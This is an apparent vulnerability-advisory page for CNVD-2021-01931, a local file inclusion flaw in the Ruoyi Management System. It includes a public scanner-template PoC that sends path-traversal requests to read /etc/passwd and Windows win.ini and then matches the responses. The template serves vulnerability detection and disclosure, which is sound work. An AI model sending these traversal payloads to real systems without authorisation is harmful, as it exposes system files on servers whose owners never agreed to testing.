CNVD-2021-01931: Ruoyi Management System - Local File Inclusion

日期: 2025-08-01 | 影响软件: Ruoyi Management System | POC: 已公开

漏洞描述

The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.

PoC代码[已公开]

id: CNVD-2021-01931

info:
  name: Ruoyi Management System - Local File Inclusion
  author: daffainfo,ritikchaddha
  severity: high
  description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
  reference:
    - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: cnvd,cnvd2021,ruoyi,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
      - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"

    matchers-condition: or
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a00483046022100cd5cecd76cb20bcce4a965b3e4b9a3606c8d0f7f7d14ecc8e61ba2c19a74d631022100e18d3b8ca628844b1dd35c60ed3b74bb2b330a5bf7d0e58a1d17e269398c4061:922c64590222798bb761d5b6d8e72950